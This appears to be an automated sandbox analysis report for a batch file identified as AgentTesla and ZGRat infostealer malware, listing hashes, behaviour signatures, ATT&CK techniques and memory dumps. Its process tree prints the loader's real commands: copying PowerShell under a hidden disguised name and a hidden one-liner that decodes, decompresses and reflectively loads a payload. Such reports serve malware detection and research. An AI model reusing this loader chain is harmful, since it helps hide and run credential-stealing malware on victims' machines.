Overview

overview

10

Static

static

1

Xlrfx.bat

windows7-x64

8

Xlrfx.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    125s
  • max time network
    131s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15-05-2024 10:56

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Xlrfx.bat

  • Size

    2.5MB

  • MD5

    044b5f7f1996339fb95ab61afe9ce63b

  • SHA1

    9b1ad4a81ae03ebb25d252eb12473dfe667af900

  • SHA256

    c8b23374cfaebcceb230474be736c7d7c012c073a9c253bcf3dec1a26c920079

  • SHA512

    77faaa93f02be4925d7238b63bc3651525f4438f70231173944aa71c1dc3429cbc9905cdaaf7eec454bd08f7e12b81424cf6db4021615e52a79635078817d948

  • SSDEEP

    49152:Bio8vLA4esjKTI2VerQB+Mctxbqrhl8ManSazNv:o

Score
10/10
agentteslazgratevasionkeyloggerpersistenceratspywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Detect ZGRat V1 34 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

    ratzgrat
  • Sets file to hidden 1 TTPs 1 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

    evasion
  • Executes dropped EXE 1 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

    spywarestealer
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

    spywarestealer
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 17 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Xlrfx.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:384
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo F "
      2⤵
        PID:4168
      • C:\Windows\system32\xcopy.exe
        xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Xlrfx.bat.Nsg
        2⤵
          PID:2936
        • C:\Windows\system32\attrib.exe
          attrib +s +h C:\Users\Admin\AppData\Local\Temp\Xlrfx.bat.Nsg
          2⤵
          • Sets file to hidden
          • Views/modifies file attributes
          PID:448
        • C:\Users\Admin\AppData\Local\Temp\Xlrfx.bat.Nsg
          C:\Users\Admin\AppData\Local\Temp\Xlrfx.bat.Nsg -WindowStyle hidden -command "$Eshusr = Get-Content 'C:\Users\Admin\AppData\Local\Temp\Xlrfx.bat' | select-object -Last 1; $Yhyoxigy = [System.Convert]::FromBase64String($Eshusr);$Uneafks = New-Object System.IO.MemoryStream( , $Yhyoxigy );$Iaohomn = New-Object System.IO.MemoryStream;$Bydqksifw = New-Object System.IO.Compression.GzipStream $Uneafks, ([IO.Compression.CompressionMode]::Decompress);$Bydqksifw.CopyTo( $Iaohomn );$Bydqksifw.Close();$Uneafks.Close();[byte[]] $Yhyoxigy = $Iaohomn.ToArray();[Array]::Reverse($Yhyoxigy); $Pbdppxx = [System.Threading.Thread]::GetDomain().Load($Yhyoxigy); $Izgbjcqwat = $Pbdppxx.EntryPoint.DeclaringType.GetMethods()[0].Invoke($null, $null) | Out-Null"
          2⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:508
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            3⤵
            • Adds Run key to start application
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:5636
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3416,i,13879737908471496610,15335851594401413307,262144 --variations-seed-version --mojo-platform-channel-handle=4320 /prefetch:8
        1⤵
          PID:3896

        Network

        MITRE ATT&CK Matrix ATT&CK v13

        Initial Access

        Execution

        Persistence

        Boot or Logon Autostart Execution

        1
        T1547

        Registry Run Keys / Startup Folder

        1
        T1547.001

        Privilege Escalation

        Boot or Logon Autostart Execution

        1
        T1547

        Registry Run Keys / Startup Folder

        1
        T1547.001

        Defense Evasion

        Hide Artifacts

        2
        T1564

        Hidden Files and Directories

        2
        T1564.001

        Modify Registry

        1
        T1112

        Credential Access

        Unsecured Credentials

        4
        T1552

        Credentials In Files

        3
        T1552.001

        Credentials in Registry

        1
        T1552.002

        Discovery

        Lateral Movement

        Collection

        Data from Local System

        4
        T1005

        Exfiltration

        Command and Control

        Impact

        Resource Development

        Reconnaissance

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\Xlrfx.bat.Nsg
          Filesize

          423KB

          MD5

          c32ca4acfcc635ec1ea6ed8a34df5fac

          SHA1

          f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

          SHA256

          73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

          SHA512

          6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

          Download Submit
        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ky1qgdwt.lca.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          Download Submit
        • memory/508-5-0x000000007521E000-0x000000007521F000-memory.dmp
          Filesize

          4KB

          Download
        • memory/508-6-0x0000000005210000-0x0000000005246000-memory.dmp
          Filesize

          216KB

          Download
        • memory/508-8-0x00000000059A0000-0x0000000005FC8000-memory.dmp
          Filesize

          6.2MB

          Download
        • memory/508-7-0x0000000075210000-0x00000000759C0000-memory.dmp
          Filesize

          7.7MB

          Download
        • memory/508-9-0x0000000005850000-0x0000000005872000-memory.dmp
          Filesize

          136KB

          Download
        • memory/508-10-0x0000000006040000-0x00000000060A6000-memory.dmp
          Filesize

          408KB

          Download
        • memory/508-11-0x00000000060B0000-0x0000000006116000-memory.dmp
          Filesize

          408KB

          Download
        • memory/508-21-0x0000000006320000-0x0000000006674000-memory.dmp
          Filesize

          3.3MB

          Download
        • memory/508-22-0x00000000067C0000-0x00000000067DE000-memory.dmp
          Filesize

          120KB

          Download
        • memory/508-23-0x0000000006810000-0x000000000685C000-memory.dmp
          Filesize

          304KB

          Download
        • memory/508-24-0x00000000077A0000-0x0000000007836000-memory.dmp
          Filesize

          600KB

          Download
        • memory/508-25-0x0000000006CC0000-0x0000000006CDA000-memory.dmp
          Filesize

          104KB

          Download
        • memory/508-26-0x0000000006D50000-0x0000000006D72000-memory.dmp
          Filesize

          136KB

          Download
        • memory/508-27-0x0000000007E40000-0x00000000083E4000-memory.dmp
          Filesize

          5.6MB

          Download
        • memory/508-28-0x0000000008A70000-0x00000000090EA000-memory.dmp
          Filesize

          6.5MB

          Download
        • memory/508-29-0x00000000083F0000-0x000000000886C000-memory.dmp
          Filesize

          4.5MB

          Download
        • memory/508-30-0x000000000B0F0000-0x000000000B320000-memory.dmp
          Filesize

          2.2MB

          Download
        • memory/508-31-0x0000000007DA0000-0x0000000007E32000-memory.dmp
          Filesize

          584KB

          Download
        • memory/508-35-0x000000000B0F0000-0x000000000B31B000-memory.dmp
          Filesize

          2.2MB

          Download
        • memory/508-37-0x000000000B0F0000-0x000000000B31B000-memory.dmp
          Filesize

          2.2MB

          Download
        • memory/508-59-0x000000000B0F0000-0x000000000B31B000-memory.dmp
          Filesize

          2.2MB

          Download
        • memory/508-71-0x000000000B0F0000-0x000000000B31B000-memory.dmp
          Filesize

          2.2MB

          Download
        • memory/508-77-0x000000000B0F0000-0x000000000B31B000-memory.dmp
          Filesize

          2.2MB

          Download
        • memory/508-83-0x000000000B0F0000-0x000000000B31B000-memory.dmp
          Filesize

          2.2MB

          Download
        • memory/508-91-0x000000000B0F0000-0x000000000B31B000-memory.dmp
          Filesize

          2.2MB

          Download
        • memory/508-95-0x000000000B0F0000-0x000000000B31B000-memory.dmp
          Filesize

          2.2MB

          Download
        • memory/508-89-0x000000000B0F0000-0x000000000B31B000-memory.dmp
          Filesize

          2.2MB

          Download
        • memory/508-87-0x000000000B0F0000-0x000000000B31B000-memory.dmp
          Filesize

          2.2MB

          Download
        • memory/508-81-0x000000000B0F0000-0x000000000B31B000-memory.dmp
          Filesize

          2.2MB

          Download
        • memory/508-79-0x000000000B0F0000-0x000000000B31B000-memory.dmp
          Filesize

          2.2MB

          Download
        • memory/508-93-0x000000000B0F0000-0x000000000B31B000-memory.dmp
          Filesize

          2.2MB

          Download
        • memory/508-85-0x000000000B0F0000-0x000000000B31B000-memory.dmp
          Filesize

          2.2MB

          Download
        • memory/508-75-0x000000000B0F0000-0x000000000B31B000-memory.dmp
          Filesize

          2.2MB

          Download
        • memory/508-73-0x000000000B0F0000-0x000000000B31B000-memory.dmp
          Filesize

          2.2MB

          Download
        • memory/508-69-0x000000000B0F0000-0x000000000B31B000-memory.dmp
          Filesize

          2.2MB

          Download
        • memory/508-67-0x000000000B0F0000-0x000000000B31B000-memory.dmp
          Filesize

          2.2MB

          Download
        • memory/508-63-0x000000000B0F0000-0x000000000B31B000-memory.dmp
          Filesize

          2.2MB

          Download
        • memory/508-61-0x000000000B0F0000-0x000000000B31B000-memory.dmp
          Filesize

          2.2MB

          Download
        • memory/508-65-0x000000000B0F0000-0x000000000B31B000-memory.dmp
          Filesize

          2.2MB

          Download
        • memory/508-57-0x000000000B0F0000-0x000000000B31B000-memory.dmp
          Filesize

          2.2MB

          Download
        • memory/508-55-0x000000000B0F0000-0x000000000B31B000-memory.dmp
          Filesize

          2.2MB

          Download
        • memory/508-47-0x000000000B0F0000-0x000000000B31B000-memory.dmp
          Filesize

          2.2MB

          Download
        • memory/508-45-0x000000000B0F0000-0x000000000B31B000-memory.dmp
          Filesize

          2.2MB

          Download
        • memory/508-53-0x000000000B0F0000-0x000000000B31B000-memory.dmp
          Filesize

          2.2MB

          Download
        • memory/508-51-0x000000000B0F0000-0x000000000B31B000-memory.dmp
          Filesize

          2.2MB

          Download
        • memory/508-49-0x000000000B0F0000-0x000000000B31B000-memory.dmp
          Filesize

          2.2MB

          Download
        • memory/508-43-0x000000000B0F0000-0x000000000B31B000-memory.dmp
          Filesize

          2.2MB

          Download
        • memory/508-39-0x000000000B0F0000-0x000000000B31B000-memory.dmp
          Filesize

          2.2MB

          Download
        • memory/508-33-0x000000000B0F0000-0x000000000B31B000-memory.dmp
          Filesize

          2.2MB

          Download
        • memory/508-41-0x000000000B0F0000-0x000000000B31B000-memory.dmp
          Filesize

          2.2MB

          Download
        • memory/508-32-0x000000000B0F0000-0x000000000B31B000-memory.dmp
          Filesize

          2.2MB

          Download
        • memory/508-4913-0x0000000075210000-0x00000000759C0000-memory.dmp
          Filesize

          7.7MB

          Download
        • memory/508-4915-0x0000000008930000-0x000000000897C000-memory.dmp
          Filesize

          304KB

          Download
        • memory/508-4914-0x0000000008870000-0x00000000088DC000-memory.dmp
          Filesize

          432KB

          Download
        • memory/508-4916-0x000000007521E000-0x000000007521F000-memory.dmp
          Filesize

          4KB

          Download
        • memory/508-4917-0x0000000075210000-0x00000000759C0000-memory.dmp
          Filesize

          7.7MB

          Download
        • memory/508-4918-0x0000000075210000-0x00000000759C0000-memory.dmp
          Filesize

          7.7MB

          Download
        • memory/508-4919-0x0000000075210000-0x00000000759C0000-memory.dmp
          Filesize

          7.7MB

          Download
        • memory/508-4920-0x00000000054B0000-0x0000000005504000-memory.dmp
          Filesize

          336KB

          Download
        • memory/508-4928-0x0000000075210000-0x00000000759C0000-memory.dmp
          Filesize

          7.7MB

          Download
        • memory/5636-4926-0x0000000075210000-0x00000000759C0000-memory.dmp
          Filesize

          7.7MB

          Download
        • memory/5636-4925-0x0000000000400000-0x0000000000442000-memory.dmp
          Filesize

          264KB

          Download
        • memory/5636-4927-0x0000000075210000-0x00000000759C0000-memory.dmp
          Filesize

          7.7MB

          Download
        • memory/5636-4930-0x0000000006730000-0x0000000006780000-memory.dmp
          Filesize

          320KB

          Download
        • memory/5636-4931-0x00000000067B0000-0x00000000067BA000-memory.dmp
          Filesize

          40KB

          Download
        • memory/5636-4932-0x0000000075210000-0x00000000759C0000-memory.dmp
          Filesize

          7.7MB

          Download